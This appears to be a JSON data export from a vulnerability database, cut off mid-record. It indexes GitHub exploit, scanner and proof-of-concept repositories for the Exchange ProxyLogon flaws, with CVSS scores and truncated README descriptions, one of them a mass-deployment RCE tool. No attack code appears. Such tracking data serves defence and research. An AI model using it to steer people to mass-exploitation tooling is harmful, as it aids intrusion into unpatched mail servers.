{"githubexploit": [{"lastseen": "2022-02-21T13:50:39", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. \n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T16:54:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-21978", "CVE-2021-26855"], "modified": "2022-02-21T12:12:08", "id": "F5339382-9321-5B96-934D-B803353CC9E3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:31:55", "description": "# Exch-CVE-2021-26855\nProxyLogon is the formally generic name fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T14:23:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-16T09:48:52", "id": "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:15:35", "description": "# proxylogscan\n\n<img src=\"https://proxylogon.com/images/logo-whi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T11:54:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T15:41:34", "id": "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T14:00:56", "description": "# ProxyLogon For Python3\nProxyLogon(CVE-2021-26855+CVE-2021-2706...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-17T03:56:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-28T09:27:18", "id": "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:36", "description": "# Exchange SSRF toRCE Exploit\n\n\n\n**:warning:For educational and ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T09:02:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-10-24T06:16:43", "id": "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:16", "description": "# CVE-2021-26855\nCVE-2021-26855, also known as Proxylogon, is a ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T19:35:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-11-16T01:46:59", "id": "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T03:31:40", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. \n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-01-10T21:06:44", "id": "14573955-860C-5947-8F2F-86347A606742", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:24:19", "description": "# 106362522\n\u91dd\u5c0d\u8fd1\u671f\u5fae\u8edf\u516c\u5e03\u4fee\u88dc\u906d\u99ed\u5ba2\u653b\u64ca\u7684Exchange Server\u6f0f\u6d1e\u554f\u984c\uff0c\u53f0\u7063DEVCORE\u8868\u793a\u65e9\u57281\u67085...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-19T09:33:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-04-19T09:35:18", "id": "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:01:50", "description": "# proxylogon\n\nProof-of-concept exploit for CVE-2021-26855 and CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-24T01:12:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-27T19:34:57", "id": "D7D704DD-277E-5739-BD5E-3782370FCCB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:19:32", "description": "# ProxyLogon\n\nProxyLogon is the formally generic name for CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T07:31:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T19:09:09", "id": "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:26:23", "description": "# ProxyLogon-Mass-RCE\n## Description\nPython for mass deploying p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-23T17:09:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-05-23T17:23:03", "id": "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:20", "description": " ove...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:21:19", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-21T15:50:38", "id": "3019C843-FE2F-527C-B7C1-14A1C3066721", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:45:03", "description": "# CVE-2021-26855-Scanner\nScanner and PoC for CVE-2021-26855 \n\nCr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-12T12:47:41", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-12-29T15:00:52", "id": "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:20", "description": "# CVE-2021-26855\nPoC for CVE-2021-26855 -Just a checker-\n\n# Usag...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-06T23:12:22", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-05T07:21:07", "id": "13364575-934B-5E73-AA03-AEB6910F6AD2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:23", "description": "# ExchangeWeaknessTest\n\nThis script test the CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T09:40:29", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-09T09:43:55", "id": "7758268F-2004-536A-B51F-62DA1E5A992D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:28", "description": "# ProxyLogon-CVE-2021-26855\nRCE exploit for ProxyLogon vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-14T22:57:21", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-11-25T15:13:15", "id": "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:26", "description": "# CVE-2021-26855-SSRF-Exchange\nCVE-2021-26855 SSRF Exchange Serv...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T00:55:16", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-12-15T14:41:36", "id": "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T16:13:12", "description": "# poc_proxylogon\nMicrosoft Exchange ProxyLogon PoC (CVE-2021-268...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-04T22:38:30", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-02-22T05:29:04", "id": "81FEB23C-D090-5CE8-9B92-00BE597DE052", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-04T01:37:18", "description": "# proxylogon\nmy exploit for the proxylogon chain (Microsoft Exch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-14T13:04:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-08-03T23:25:44", "id": "7C80631A-74CB-54F0-BC26-01EEF7D52760", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:39", "description": "# hafnium-exchange-splunk-csvs\nIOCs (IP addresses, hashes of web...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 